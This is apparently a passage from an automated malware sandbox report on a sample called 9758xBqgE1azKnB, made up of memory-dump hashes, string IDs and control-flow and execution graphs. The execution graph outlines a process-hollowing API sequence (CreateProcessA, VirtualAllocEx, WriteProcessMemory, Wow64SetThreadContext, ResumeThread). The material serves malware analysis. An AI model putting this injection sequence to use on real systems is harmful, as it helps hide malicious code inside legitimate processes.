• Instruction Fuzzy Hash: 19A1FD70B002158FDB29AB7AD86472E76B3FB88340F14806CD91A9F399DF749C46CB91
Strings
Memory Dump Source
• Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: d8824cb655450350c8a6d07a57b8ab21ed26a7134d91349a3f9d07b916a00607
                                                                        • Instruction ID: e0637b193c90f831a0f42093342b734b98e29814a42677c8e0961c368a096e97
                                                                        • Opcode Fuzzy Hash: d8824cb655450350c8a6d07a57b8ab21ed26a7134d91349a3f9d07b916a00607
                                                                        • Instruction Fuzzy Hash: 7A212071B002168FCB49EB79896463E7BF6AFC9200F1484AEE109DB3A5DE30CC46C791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: ecc7c0b09e8203577538f7579431ff3bf7bbfb8f99aa1a5663daa5e52095804f
                                                                        • Instruction ID: 5a92e9cd756d3334f77322d7d060db02c76e899257305916cdb64c7167830b92
                                                                        • Opcode Fuzzy Hash: ecc7c0b09e8203577538f7579431ff3bf7bbfb8f99aa1a5663daa5e52095804f
                                                                        • Instruction Fuzzy Hash: DA213271B1012A8FCB49EB79895477E7BE6EBC8200F14846DE409DB395DF30DD0A8791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Hxq
                                                                        • API String ID: 0-2956916855
                                                                        • Opcode ID: 35d2491d36b02532fb7e9e7a60a2374c6c9e7dca380429bbdf5125ff16a12576
                                                                        • Instruction ID: e8fe739d2f40d2517e49cc0686d88fb2f3601a253e0d28e34921e6aa8197fc4a
                                                                        • Opcode Fuzzy Hash: 35d2491d36b02532fb7e9e7a60a2374c6c9e7dca380429bbdf5125ff16a12576
                                                                        • Instruction Fuzzy Hash: F321AF70E042489FCB58DFB8D5543AD7BF2EF85300F5484AE8409AB295EB748E09CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0dea863d690a55bda5e69bafa5a45e3ea4ad32c0babf2401874d16da4745db87
                                                                        • Instruction ID: c0c3b5a07933fbfb4ef667a9086d1b7a50bc4c911b0e2df11cdd383cdc883079
                                                                        • Opcode Fuzzy Hash: 0dea863d690a55bda5e69bafa5a45e3ea4ad32c0babf2401874d16da4745db87
                                                                        • Instruction Fuzzy Hash: AA216FB090520A9FCB02EFB9E8545ADBFF1FF45204F00499AD459EB2A6EA341E44CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cdb2e9fdbbdcfa2d5aa9add747370547d94119dd02df2ef18fb4f4c763e56181
                                                                        • Instruction ID: b65f2ba728e624d818ebfcf568106763d84d015dbc3766a007f334e154ad0839
                                                                        • Opcode Fuzzy Hash: cdb2e9fdbbdcfa2d5aa9add747370547d94119dd02df2ef18fb4f4c763e56181
                                                                        • Instruction Fuzzy Hash: 982105B2B002159FCB44EBBE981837FBAEAEFD9351B14442ED50AD7354DE748C0547A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0683c2e7ef3ec7ab03b1c6fd3e92348c713e0b754ca06f98792bbad3f292740c
                                                                        • Instruction ID: 838418ebba87125ccb2aeefb7feaa8750ca20afb35a660888631c94ca6b39e11
                                                                        • Opcode Fuzzy Hash: 0683c2e7ef3ec7ab03b1c6fd3e92348c713e0b754ca06f98792bbad3f292740c
                                                                        • Instruction Fuzzy Hash: BC318FB090020ADFCB05EFB6D8446ADBBB2FF88300F108969D415AB350EB359E85CF51
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2a20c5b83d63c60374a216a9f15719d0b2502fe633212fc23d8f963d9b7843b
                                                                        • Instruction ID: 8cd7dd813fd08a506cc8d7ead31833aaf3de5368e8cc63857bb1eecc0e6d0fc2
                                                                        • Opcode Fuzzy Hash: d2a20c5b83d63c60374a216a9f15719d0b2502fe633212fc23d8f963d9b7843b
                                                                        • Instruction Fuzzy Hash: A52183B0A0020ADFCB04EFB6D8446ADBBB6FF88300F108569D415AB310EB746E81CF51
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40d38cc3411a6fb7c0c490e623367f09cce5a9051b7fd489e76cdf6c15d28c10
                                                                        • Instruction ID: 24f19790da59e5d3395ec1643bc592bcf04a0239e06613adf3e8b56f443837ce
                                                                        • Opcode Fuzzy Hash: 40d38cc3411a6fb7c0c490e623367f09cce5a9051b7fd489e76cdf6c15d28c10
                                                                        • Instruction Fuzzy Hash: EA11FEB0D0110AEFCF41EFFAE8445ADBBF1FB44204B00899AD429AB259EB341E44DF81
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 37d54d11b8984907fe3f6c8ce4d636c574971c09ac7f3f6b23528dfbed59385a
                                                                        • Instruction ID: 5546ba8583f558fed380d9e0b33d73d9b163eb0de1e1831a3137c09c5843cb76
                                                                        • Opcode Fuzzy Hash: 37d54d11b8984907fe3f6c8ce4d636c574971c09ac7f3f6b23528dfbed59385a
                                                                        • Instruction Fuzzy Hash: 8111CCB051020A9FCB01DF7BFA84A597BB5F749304B109A94E4198F216E6786EC7DF82
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dcb853ba4727a5f6d51cf2bcc4532b92a301e251b6bf5ed2b1fb2ae88d167f48
                                                                        • Instruction ID: f470772ecbfeadb982c7420ac61d635fa61100e90832a2521ee224a6a6eca5f7
                                                                        • Opcode Fuzzy Hash: dcb853ba4727a5f6d51cf2bcc4532b92a301e251b6bf5ed2b1fb2ae88d167f48
                                                                        • Instruction Fuzzy Hash: 22017D7051120A9FCB01DF7BFA84A557BB5F74C304B105A94A4198F215E6786EC6DF82

                                                                        Execution Graph

                                                                        Execution Coverage:10.1%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:221
                                                                        Total number of Limit Nodes:7
                                                                        execution_graph 28113 6ca1649 28115 6ca158c 28113->28115 28114 6ca15c9 28115->28114 28119 6ca32ce 28115->28119 28136 6ca3270 28115->28136 28152 6ca3260 28115->28152 28120 6ca325c 28119->28120 28121 6ca32d1 28119->28121 28122 6ca32ae 28120->28122 28168 6ca3b00 28120->28168 28172 6ca3ac0 28120->28172 28177 6ca36e3 28120->28177 28182 6ca3cce 28120->28182 28187 6ca3c4b 28120->28187 28192 6ca3f8a 28120->28192 28196 6ca37d1 28120->28196 28201 6ca38b1 28120->28201 28205 6ca4111 28120->28205 28209 6ca3952 28120->28209 28213 6ca3a1d 28120->28213 28217 6ca3ddf 28120->28217 28222 6ca37be 28120->28222 28121->28115 28122->28115 28137 6ca328a 28136->28137 28138 6ca3f8a 2 API calls 28137->28138 28139 6ca3c4b 2 API calls 28137->28139 28140 6ca3cce 2 API calls 28137->28140 28141 6ca32ae 28137->28141 28142 6ca36e3 2 API calls 28137->28142 28143 6ca3ac0 2 API calls 28137->28143 28144 6ca3b00 2 API calls 28137->28144 28145 6ca37be 2 API calls 28137->28145 28146 6ca3ddf 2 API calls 28137->28146 28147 6ca3a1d 2 API calls 28137->28147 28148 6ca3952 2 API calls 28137->28148 28149 6ca4111 2 API calls 28137->28149 28150 6ca38b1 2 API calls 28137->28150 28151 6ca37d1 2 API calls 28137->28151 28138->28141 28139->28141 28140->28141 28141->28115 28142->28141 28143->28141 28144->28141 28145->28141 28146->28141 28147->28141 28148->28141 28149->28141 28150->28141 28151->28141 28153 6ca3270 28152->28153 28154 6ca32ae 28153->28154 28155 6ca3f8a 2 API calls 28153->28155 28156 6ca3c4b 2 API calls 28153->28156 28157 6ca3cce 2 API calls 28153->28157 28158 6ca36e3 2 API calls 28153->28158 28159 6ca3ac0 2 API calls 28153->28159 28160 6ca3b00 2 API calls 28153->28160 28161 6ca37be 2 API calls 28153->28161 28162 6ca3ddf 2 API calls 28153->28162 28163 6ca3a1d 2 API calls 28153->28163 28164 6ca3952 2 API calls 28153->28164 28165 6ca4111 2 API calls 28153->28165 28166 6ca38b1 2 API calls 28153->28166 28167 6ca37d1 2 API calls 28153->28167 
28154->28115 28155->28154 28156->28154 28157->28154 28158->28154 28159->28154 28160->28154 28161->28154 28162->28154 28163->28154 28164->28154 28165->28154 28166->28154 28167->28154 28169 6ca387d 28168->28169 28227 6ca0fd8 28168->28227 28231 6ca0fd0 28168->28231 28169->28122 28173 6ca3ac6 28172->28173 28175 6ca0fd8 ReadProcessMemory 28173->28175 28176 6ca0fd0 ReadProcessMemory 28173->28176 28174 6ca387d 28174->28122 28175->28174 28176->28174 28178 6ca370f 28177->28178 28235 6ca1170 28178->28235 28239 6ca1164 28178->28239 28183 6ca3c69 28182->28183 28243 6ca0c99 28183->28243 28247 6ca0ca0 28183->28247 28184 6ca3aae 28184->28122 28188 6ca3c51 28187->28188 28190 6ca0c99 ResumeThread 28188->28190 28191 6ca0ca0 ResumeThread 28188->28191 28189 6ca3aae 28189->28122 28190->28189 28191->28189 28251 6ca0e28 28192->28251 28255 6ca0e21 28192->28255 28193 6ca3fa8 28197 6ca37de 28196->28197 28199 6ca0fd8 ReadProcessMemory 28197->28199 28200 6ca0fd0 ReadProcessMemory 28197->28200 28198 6ca387d 28198->28122 28199->28198 28200->28198 28259 6ca0d49 28201->28259 28263 6ca0d50 28201->28263 28202 6ca38cb 28202->28122 28207 6ca0d49 Wow64SetThreadContext 28205->28207 28208 6ca0d50 Wow64SetThreadContext 28205->28208 28206 6ca412b 28207->28206 28208->28206 28267 6ca0ee8 28209->28267 28271 6ca0ee0 28209->28271 28210 6ca3979 28215 6ca0ee8 WriteProcessMemory 28213->28215 28216 6ca0ee0 WriteProcessMemory 28213->28216 28214 6ca3a4e 28215->28214 28216->28214 28219 6ca3c52 28217->28219 28218 6ca3aae 28218->28122 28219->28218 28220 6ca0c99 ResumeThread 28219->28220 28221 6ca0ca0 ResumeThread 28219->28221 28220->28218 28221->28218 28223 6ca37cb 28222->28223 28225 6ca0ee8 WriteProcessMemory 28223->28225 28226 6ca0ee0 WriteProcessMemory 28223->28226 28224 6ca37a6 28224->28122 28225->28224 28226->28224 28228 6ca1023 ReadProcessMemory 28227->28228 28230 6ca1067 28228->28230 28230->28169 28232 6ca0fd8 ReadProcessMemory 28231->28232 28234 6ca1067 28232->28234 28234->28169 28236 6ca11f9 28235->28236 
28236->28236 28237 6ca135e CreateProcessA 28236->28237 28238 6ca13bb 28237->28238 28238->28238 28240 6ca1170 CreateProcessA 28239->28240 28242 6ca13bb 28240->28242 28242->28242 28244 6ca0ca0 ResumeThread 28243->28244 28246 6ca0d11 28244->28246 28246->28184 28248 6ca0ce0 ResumeThread 28247->28248 28250 6ca0d11 28248->28250 28250->28184 28252 6ca0e68 VirtualAllocEx 28251->28252 28254 6ca0ea5 28252->28254 28254->28193 28256 6ca0e28 VirtualAllocEx 28255->28256 28258 6ca0ea5 28256->28258 28258->28193 28260 6ca0d50 Wow64SetThreadContext 28259->28260 28262 6ca0ddd 28260->28262 28262->28202 28264 6ca0d95 Wow64SetThreadContext 28263->28264 28266 6ca0ddd 28264->28266 28266->28202 28268 6ca0f30 WriteProcessMemory 28267->28268 28270 6ca0f87 28268->28270 28270->28210 28272 6ca0ee8 WriteProcessMemory 28271->28272 28274 6ca0f87 28272->28274 28274->28210 28285 6ca15d9 28287 6ca158c 28285->28287 28286 6ca15c9 28287->28286 28288 6ca32ce 12 API calls 28287->28288 28289 6ca3260 12 API calls 28287->28289 28290 6ca3270 12 API calls 28287->28290 28288->28287 28289->28287 28290->28287 28291 94d000 28292 94d046 28291->28292 28296 94d5e8 28292->28296 28299 94d5d9 28292->28299 28293 94d133 28298 94d616 28296->28298 28302 94d23c 28296->28302 28298->28293 28300 94d23c DuplicateHandle 28299->28300 28301 94d616 28300->28301 28301->28293 28303 94d650 DuplicateHandle 28302->28303 28304 94d6e6 28303->28304 28304->28298 28275 6ca44c0 28276 6ca464b 28275->28276 28277 6ca44e6 28275->28277 28277->28276 28280 6ca4738 28277->28280 28283 6ca4740 PostMessageW 28277->28283 28281 6ca4740 PostMessageW 28280->28281 28282 6ca47ac 28281->28282 28282->28277 28284 6ca47ac 28283->28284 28284->28277 28305 944668 28306 94467a 28305->28306 28307 944686 28306->28307 28311 944779 28306->28311 28316 943e34 28307->28316 28309 9446a5 28312 94479d 28311->28312 28320 944888 28312->28320 28324 944879 28312->28324 28317 943e3f 28316->28317 28332 945c44 28317->28332 28319 947018 28319->28309 28322 9448af 28320->28322 28321 
94498c 28321->28321 28322->28321 28328 9444b4 28322->28328 28326 9448af 28324->28326 28325 94498c 28325->28325 28326->28325 28327 9444b4 CreateActCtxA 28326->28327 28327->28325 28329 945918 CreateActCtxA 28328->28329 28331 9459db 28329->28331 28333 945c4f 28332->28333 28336 945c64 28333->28336 28335 9470bd 28335->28319 28337 945c6f 28336->28337 28340 945c94 28337->28340 28339 94719a 28339->28335 28341 945c9f 28340->28341 28344 945cc4 28341->28344 28343 94728d 28343->28339 28345 945ccf 28344->28345 28346 948330 28345->28346 28353 9485d9 28345->28353 28348 94858b 28346->28348 28359 94ac3b 28346->28359 28347 9485c9 28347->28343 28348->28347 28363 94cd37 28348->28363 28368 94cd38 28348->28368 28354 94858e 28353->28354 28356 9485e7 28353->28356 28355 9485c9 28354->28355 28357 94cd37 GetModuleHandleW 28354->28357 28358 94cd38 GetModuleHandleW 28354->28358 28355->28346 28356->28346 28357->28355 28358->28355 28373 94ac70 28359->28373 28376 94ac5f 28359->28376 28360 94ac4e 28360->28348 28364 94cd59 28363->28364 28365 94cd7d 28364->28365 28385 94cee7 28364->28385 28389 94cee8 28364->28389 28365->28347 28369 94cd59 28368->28369 28370 94cd7d 28369->28370 28371 94cee7 GetModuleHandleW 28369->28371 28372 94cee8 GetModuleHandleW 28369->28372 28370->28347 28371->28370 28372->28370 28380 94ad68 28373->28380 28374 94ac7f 28374->28360 28377 94ac70 28376->28377 28379 94ad68 GetModuleHandleW 28377->28379 28378 94ac7f 28378->28360 28379->28378 28381 94ad9c 28380->28381 28382 94ad79 28380->28382 28381->28374 28382->28381 28383 94afa0 GetModuleHandleW 28382->28383 28384 94afcd 28383->28384 28384->28374 28386 94cef5 28385->28386 28388 94cf2f 28386->28388 28393 94baa0 28386->28393 28388->28365 28390 94cef5 28389->28390 28391 94cf2f 28390->28391 28392 94baa0 GetModuleHandleW 28390->28392 28391->28365 28392->28391 28394 94baab 28393->28394 28396 94dc48 28394->28396 28397 94d29c 28394->28397 28398 94d2a7 28397->28398 28399 945cc4 GetModuleHandleW 28398->28399 28400 94dcb7 28399->28400 
28400->28396

                                                                        Control-flow Graph

                                                                        control_flow_graph 451 6a134b8-6a134e0 452 6a134e2 451->452 453 6a134e7-6a135a3 451->453 452->453 456 6a135a5-6a135a6 453->456 457 6a135a8-6a135b5 453->457 458 6a135c7-6a135cb 456->458 457->456 457->458 459 6a135d1-6a135fb 458->459 460 6a13abb-6a13afd 458->460 463 6a13601-6a13619 459->463 464 6a13cc8-6a13cd4 459->464 469 6a13b00-6a13b04 460->469 465 6a13cda-6a13ce3 463->465 466 6a1361f-6a13620 463->466 464->465 472 6a13ce9-6a13cf5 465->472 468 6a13cae-6a13cba 466->468 470 6a13cc0-6a13cc7 468->470 471 6a13625-6a13631 468->471 473 6a136d6-6a136da 469->473 474 6a13b0a-6a13b10 469->474 477 6a13633 471->477 478 6a13638-6a13653 471->478 483 6a13cfb-6a13d07 472->483 475 6a136ec-6a136f2 473->475 476 6a136dc-6a136ea 473->476 474->460 479 6a13b12-6a13b6d 474->479 481 6a13737-6a1373b 475->481 480 6a1374a-6a1377c 476->480 477->478 478->472 482 6a13659-6a1367e 478->482 498 6a13ba4-6a13bce 479->498 499 6a13b6f-6a13ba2 479->499 504 6a137a6 480->504 505 6a1377e-6a1378a 480->505 484 6a136f4-6a13700 481->484 485 6a1373d 481->485 482->483 496 6a13684-6a13686 482->496 491 6a13d0d-6a13d14 483->491 488 6a13702 484->488 489 6a13707-6a1370f 484->489 492 6a13740-6a13744 485->492 488->489 494 6a13711-6a13725 489->494 495 6a13734 489->495 492->480 497 6a136bc-6a136d3 492->497 501 6a13689-6a13694 494->501 502 6a1372b-6a13732 494->502 495->481 496->501 497->473 512 6a13bd7-6a13c56 498->512 499->512 501->491 506 6a1369a-6a136b7 501->506 502->485 511 6a137ac-6a137d9 504->511 508 6a13794-6a1379a 505->508 509 6a1378c-6a13792 505->509 506->492 513 6a137a4 508->513 509->513 518 6a13828-6a138bb 511->518 519 6a137db-6a13813 511->519 527 6a13c5d-6a13c70 512->527 513->511 534 6a138c4-6a138c5 518->534 535 6a138bd 518->535 526 6a13c7f-6a13c84 519->526 528 6a13c86-6a13c94 526->528 529 6a13c9b-6a13cab 526->529 527->526 528->529 529->468 536 6a13916-6a1391c 534->536 535->534 537 6a138c7-6a138e6 536->537 538 6a1391e-6a139e0 536->538 539 
6a138e8 537->539 540 6a138ed-6a13913 537->540 549 6a13a21-6a13a25 538->549 550 6a139e2-6a13a1b 538->550 539->540 540->536 551 6a13a27-6a13a60 549->551 552 6a13a66-6a13a6a 549->552 550->549 551->552 554 6a13aab-6a13aaf 552->554 555 6a13a6c-6a13aa5 552->555 554->479 556 6a13ab1-6a13ab9 554->556 555->554 556->469
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$:$pxq$~
                                                                        • API String ID: 0-2366959149
                                                                        • Opcode ID: de6192c830d933e678701291d3695d825ef4b506e3abdf8ecb17c525dec7c067
                                                                        • Instruction ID: 1164d07cf7e72dc05e63124e30c043240618ef5904e31a6fcbf56d50ba9587fa
                                                                        • Opcode Fuzzy Hash: de6192c830d933e678701291d3695d825ef4b506e3abdf8ecb17c525dec7c067
                                                                        • Instruction Fuzzy Hash: CF42D175E00228DFDF55DFA9C980B99BBB2FF89300F1580E9E509AB261D731A991CF50

                                                                        Control-flow Graph

                                                                        control_flow_graph 663 6a12106-6a1210a 664 6a1210b-6a12120 663->664 665 6a12acd-6a12ae3 663->665 664->665 666 6a12121-6a1212c 664->666 668 6a12132-6a1213e 666->668 669 6a1214a-6a12159 668->669 671 6a121b8-6a121bc 669->671 672 6a121c2-6a121cb 671->672 673 6a12264-6a122ce 671->673 674 6a121d1-6a121e7 672->674 675 6a120c6-6a120d2 672->675 673->665 711 6a122d4-6a1281b 673->711 681 6a12239-6a1224b 674->681 682 6a121e9-6a121ec 674->682 675->665 677 6a120d8-6a120e4 675->677 679 6a120e6-6a120fa 677->679 680 6a1215b-6a12161 677->680 679->680 690 6a120fc-6a12105 679->690 680->665 683 6a12167-6a1217f 680->683 691 6a12251-6a12261 681->691 692 6a12a0c-6a12ac2 681->692 682->665 685 6a121f2-6a1222f 682->685 683->665 694 6a12185-6a121ad 683->694 685->673 707 6a12231-6a12237 685->707 690->663 692->665 694->671 707->681 707->682 789 6a12832-6a128c5 711->789 790 6a1281d-6a12827 711->790 791 6a128d0-6a12963 789->791 790->791 792 6a1282d 790->792 793 6a1296e-6a12a01 791->793 792->793 793->692
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D
                                                                        • API String ID: 0-2746444292
                                                                        • Opcode ID: 40f7db8e7f6adaeccd10a9c29db9389d093aaccfad2dcc1e078b538f39958aba
                                                                        • Instruction ID: 365741d0c9eb27da7713e86fdcdb2b99368fd164c407c9f92dc82db240144a7a
                                                                        • Opcode Fuzzy Hash: 40f7db8e7f6adaeccd10a9c29db9389d093aaccfad2dcc1e078b538f39958aba
                                                                        • Instruction Fuzzy Hash: E152E774A002299FDB64DF68C898B9DB7B6FF89300F1041D9D50AAB365DB34AE81CF51

                                                                        Control-flow Graph (graph data omitted)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914817282.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6a10000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                        • API String ID: 0-3472957384
                                                                        • Opcode ID: 02735377681180f62ed144d08c47f7e8b01523822f43635e61c99ffa18a412aa
                                                                        • Instruction ID: e710cf7bb127a4f5372fb239390111bd0fa55ed517ef34ebcb3cb8f3e3929acb
                                                                        • Opcode Fuzzy Hash: 02735377681180f62ed144d08c47f7e8b01523822f43635e61c99ffa18a412aa
                                                                        • Instruction Fuzzy Hash: 14E1C970B142058FDB99AF79D86866E7BF6EF89310B144469E006DF361EB34CE81CB91

                                                                        Control-flow Graph (graph data omitted)
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CA13A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 06c31042e262581114244f7cabbab6e7b68233688c137c5ba6d34bd7766cd874
                                                                        • Instruction ID: 225ebaee2be562738c0da902fe1efc17bdbf0a1ca23045417a2d1cca6d446417
                                                                        • Opcode Fuzzy Hash: 06c31042e262581114244f7cabbab6e7b68233688c137c5ba6d34bd7766cd874
                                                                        • Instruction Fuzzy Hash: E1A18071D0035A8FEF54CFA8C845BDDBBB2BF49318F088569E808A7240DB759A85CF91

                                                                        Control-flow Graph (graph data omitted)
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06CA13A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1914925439.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_6ca0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: ad4035a3eae8655c5da5501a1429de27ae9fe466c6d0f42536daa72c970a8920
                                                                        • Instruction ID: 3dfb54a172157a17bc49e8961500cd16f1c0704f5886afc468fd270c4c62e2c1
                                                                        • Opcode Fuzzy Hash: ad4035a3eae8655c5da5501a1429de27ae9fe466c6d0f42536daa72c970a8920
                                                                        • Instruction Fuzzy Hash: D2916F71D0075A8FEF54CFA8C845BDDBBB2BF49318F088569E808A7640DB749A85CF91

                                                                        Control-flow Graph (graph data omitted)
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0094AFBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: b098f9d7a53eb60743d94b0b348b780bc0fece07d85313f989de0bf3b61b2fcc
                                                                        • Instruction ID: 850db33b398293eafe9e8aedfbd0958ff534b159f93d2fe6fdaf79c62e6c61ee
                                                                        • Opcode Fuzzy Hash: b098f9d7a53eb60743d94b0b348b780bc0fece07d85313f989de0bf3b61b2fcc
                                                                        • Instruction Fuzzy Hash: 7D713370A00B458FD724DF6AD440B5ABBF5FF88310F008A2DE49ADBA50D735E949CB92

                                                                        Control-flow Graph (graph data omitted)
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 009459C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 85965e4b633f78157eeb8f518e30fd054b55cdbae88dc2e40ce542f929af688a
                                                                        • Instruction ID: 06a677be47e8d43a470b48292f8aab8508788fc39ffe441f247f33658ae98192
                                                                        • Opcode Fuzzy Hash: 85965e4b633f78157eeb8f518e30fd054b55cdbae88dc2e40ce542f929af688a
                                                                        • Instruction Fuzzy Hash: EF41E2B0C00A19CFDB24DFAAC885BCDBBF5BF49314F20815AD408AB251DB756946CF50

                                                                        Control-flow Graph (graph data omitted)
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 009459C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000013.00000002.1907824447.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_19_2_940000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: d638b39d9e353a06b07fdfa24a183c2dc93b1c9205cf44048b999bbb2eb54500
                                                                        • Instruction ID: 4793a0e63b63f423c673f85e7b52c5335a27282d17373f31f9ba5e73e5dcac59
                                                                        • Opcode Fuzzy Hash: d638b39d9e353a06b07fdfa24a183c2dc93b1c9205cf44048b999bbb2eb54500
                                                                        • Instruction Fuzzy Hash: 0341C0B0C00B1DCBDB24DFAAC885B9DBBF5BF48314F20856AD408AB252DB756945CF90
                                                                        APIs
